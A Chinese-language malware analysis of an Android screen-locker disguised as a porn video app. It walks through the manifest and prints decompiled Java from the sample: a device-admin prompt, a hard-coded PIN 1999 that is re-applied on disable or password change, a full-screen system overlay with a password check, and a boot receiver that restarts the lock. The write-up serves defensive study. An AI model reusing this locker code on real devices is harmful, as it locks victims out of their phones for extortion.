伪色播锁机分析

打开AndroidManifest.xml看看都有哪些组件

图片说明
  • Activity
    类名为com.h.M
  • Receiver
    com.h.bbb开机启动时会调用该类
    com.h.MyAdmin 激活设备管理器时调用该类
  • Service 类名为com.h.s

病毒常用的权限:

  • android.permission.SEND_SMS
    发送短信
  • android.permission.SYSTEM_ALERT_WINDOW
    置顶系统警报窗口,大部分锁机软件原理就是这样实现的。
  • android.permission.RECEIVE_BOOT_COMPLETED
    开机自启动

启动后界面如下图:

代码分析

首先来到入口点代码:

// Launcher activity of the sample. The only work visible here is to request
// device-administrator rights for com.h.MyAdmin as soon as the activity is created.
public class M
extends Activity
{
// Opens the system "activate device administrator" dialog for com.h.MyAdmin.
// Admin rights are what later allow lockNow()/resetPassword() in MyAdmin.
private void activiteDevice()
{
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
try
{
// The admin receiver is resolved by name instead of a direct class reference;
// the manifest declares com.h.MyAdmin as a Receiver.
Class localClass = Class.forName("com.h.MyAdmin");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", new ComponentName(this, localClass));
// Result code 0 is never inspected in this excerpt; the accept/deny outcome is
// handled by MyAdmin's callbacks (see onEnabled / onDisableRequested below).
startActivityForResult(localIntent, 0);
return;
}
catch (ClassNotFoundException localClassNotFoundException)
{
throw new NoClassDefFoundError(localClassNotFoundException.getMessage());
}
}
@Override
public void onCreate(Bundle paramBundle)
{
// LogCatBroadcaster does not appear to be an Android framework class; it is
// bundled with the sample and its purpose is not visible in this excerpt.
LogCatBroadcaster.start(this);
super.onCreate(paramBundle);
// Prompt for admin rights immediately, before any UI of its own is shown.
activiteDevice();
}
}

函数activiteDevice为打开设备管理器激活设备。startActivityForResult打开设备管理器的界面,由接收器com.h.MyAdmin类来处理对应的激活或拒绝操作。

当用户点击激活设备管理器,就会调用onEnabled来处理相关操作。在com.h.MyAdmin中找到onEnabled函数,它调用startService来启动com.h.s注册的服务。

// DeviceAdminReceiver callback, invoked once the user grants admin rights.
// Two effects: start the lock-screen service com.h.s, and set the device
// password to the hard-coded value "1999" via DevicePolicyManager.resetPassword.
public void onEnabled(Context paramContext, Intent paramIntent)
{
// The PIN is a compile-time constant, so it is recoverable from the APK itself.
String str = Integer.toString(1999);
try
{
Object localObject = Class.forName("com.h.s");
localObject = new Intent(paramContext, (Class)localObject);
((Intent)localObject).setFlags(268435456); // 0x10000000 = Intent.FLAG_ACTIVITY_NEW_TASK
paramContext.startService((Intent)localObject);
// getManager() returns the DevicePolicyManager; flags 0 means a plain reset.
getManager(paramContext).resetPassword(str, 0);
super.onEnabled(paramContext, paramIntent);
return;
}
catch (ClassNotFoundException paramContext) // decompiler artifact: the exception reuses the parameter name
{
throw new NoClassDefFoundError(paramContext.getMessage());
}
}

当你想要取消激活设备(onDisableRequested)或者改变设备管理器的pin码(onPasswordChanged)时,会先把pin码设置成1999。这样,想要对设备管理器进行相关操作都需要先输入pin码1999。

// Called when the user tries to deactivate the device administrator.
// Locks the device immediately and re-applies the hard-coded PIN "1999",
// so any attempt to remove the admin first has to get past that PIN.
@Override
public CharSequence onDisableRequested(Context paramContext, Intent paramIntent)
{
String str = Integer.toString(1999);
getManager(paramContext).lockNow();
getManager(paramContext).resetPassword(str, 0);
// The super call supplies the (default) warning text shown in the dialog.
return super.onDisableRequested(paramContext, paramIntent);
}
// Called after the device password changes. Mirrors onDisableRequested:
// lock right away and force the password back to the hard-coded "1999",
// which undoes any password the user manages to set.
@Override
public void onPasswordChanged(Context paramContext, Intent paramIntent)
{
String str = Integer.toString(1999);
getManager(paramContext).lockNow();
getManager(paramContext).resetPassword(str, 0);
super.onPasswordChanged(paramContext, paramIntent);
}

接收器com.h.MyAdmin启动了服务com.h.s,Service启动时先调用onCreate,然后是onStart。

DU为病毒作者自己写的DES加解密工具,this.passw存放着解锁密码,由 (Math.random() * 100000000) - 2 算出,密码被放在Flowers.xml文件里。

// Service.onCreate of com.h.s: derives the unlock value and prepares the DES
// helper (DU) used to protect it in shared preferences.
public void onCreate()
{
super.onCreate();
// Math.random() is not a cryptographic RNG; the unlock value is a number below
// 1e8, and "passw" is simply that value minus 2.
this.pass = ((Math.random() * 100000000));
this.passw = new Long(this.pass - 2);
// The effective DES key is obtained by decrypting a hard-coded ciphertext with
// the hard-coded key "flower", so both the key and anything encrypted with it
// are recoverable from the APK alone.
this.des = new DU("flower");
try
{
this.des = new DU(this.des.decrypt("c29fe56fa59ab0db"));
// Backed by Flowers.xml; mode 0 = Context.MODE_PRIVATE.
this.share = getSharedPreferences("Flowers", 0);
this.editor = this.share.edit();
// "m" is written only on the first run; later launches keep the original value.
// Where the "passw" key read by the unlock button is written is not shown here.
if (this.share.getLong("m", 0) == 0)
{
this.editor.putLong("m", this.pass);
this.editor.commit();
}
}
... // the original listing elides the rest of the method (catch block etc.)
}

onStart调用函数c开始锁屏,通过mWindowManager窗口管理器把锁屏布局添加为系统窗口并置顶。在OnClickListener匿名类中,将用户输入的数据与保存在Flowers.xml的密码比较,如果一致,就取消锁屏。

// Service.onStart: every start request (admin activation, boot receiver)
// re-runs c(), which attaches the lock overlay.
public void onStart(Intent paramIntent, int paramInt)
{
super.onStart(paramIntent, paramInt);
c();
}
}
// Builds the lock screen: inflates a layout and adds it straight to the
// WindowManager as a system-level window, which is what SYSTEM_ALERT_WINDOW
// allows and what keeps it above the home screen and other apps.
private void c()
{
this.wmParams = new WindowManager.LayoutParams();
Application localApplication = getApplication();
getApplication(); // redundant call left over from decompilation
this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE));
this.wmParams.type = 2010;  // WindowManager.LayoutParams.TYPE_SYSTEM_ERROR: drawn on top of everything it can (deprecated for non-system apps in API 26)
this.wmParams.format = 1;   // PixelFormat.RGBA_8888
this.wmParams.flags = 1280; // 0x500 = FLAG_FULLSCREEN | FLAG_LAYOUT_IN_SCREEN
this.wmParams.gravity = 49; // 0x31 = Gravity.TOP | Gravity.CENTER_HORIZONTAL
this.wmParams.x = 0;
this.wmParams.y = 0;
this.wmParams.width = -1;   // MATCH_PARENT
this.wmParams.height = -1;  // MATCH_PARENT
// Raw resource ids because the listing is decompiled: one layout with a
// text view, an EditText for the password and a Button to submit it.
this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(2130903041, (ViewGroup)null);
this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
this.bt = ((Button)this.mFloatLayout.findViewById(2131296258));
this.ed = ((EditText)this.mFloatLayout.findViewById(2131296257));
this.tv = ((TextView)this.mFloatLayout.findViewById(2131296256));
try
{
this.ed.setHint("在这输入密码!");
this.tv.append("随机码:");
this.bt.setOnClickListener(new View.OnClickListener()
{
@Override
public void onClick(View paramAnonymousView)
{
try
{
// The overlay is removed only when the typed text equals the DES-decrypted
// "passw" preference; the comparison is a plain String.equals.
if (s.this.ed.getText().toString().equals(s.this.des.decrypt(s.this.share.getString("passw", ""))))
{
// access$L1000001/2 are synthetic accessors; presumably mWindowManager and mFloatLayout.
s.access$L1000001(s.this).removeView(s.access$L1000002(s.this));
s.this.stopSelf();
}
return;
}
catch (Exception paramAnonymousView) {} // any failure (e.g. decrypt error) is swallowed; the lock stays up
}
});
} // the original listing is truncated here: the catch block and closing brace of c() are not shown

手机开机后,接收器com.h.bbb在onReceive再次启动com.h.s服务,即锁屏。

// BroadcastReceiver com.h.bbb (registered for BOOT_COMPLETED in the manifest):
// restarts the lock service after every reboot, so the overlay comes back even
// if the service was stopped.
public void onReceive(Context paramContext, Intent paramIntent)
{
if (paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED")) {
abortBroadcast();
}
try
{
// Same reflective lookup of com.h.s as in MyAdmin.onEnabled.
paramIntent = Class.forName("com.h.s");
paramIntent = new Intent(paramContext, paramIntent);
paramIntent.addFlags(268435456); // 0x10000000 = Intent.FLAG_ACTIVITY_NEW_TASK
paramContext.startService(paramIntent);
return;
}
catch (ClassNotFoundException paramContext) // decompiler artifact: the exception reuses the parameter name
{
throw new NoClassDefFoundError(paramContext.getMessage());
}
}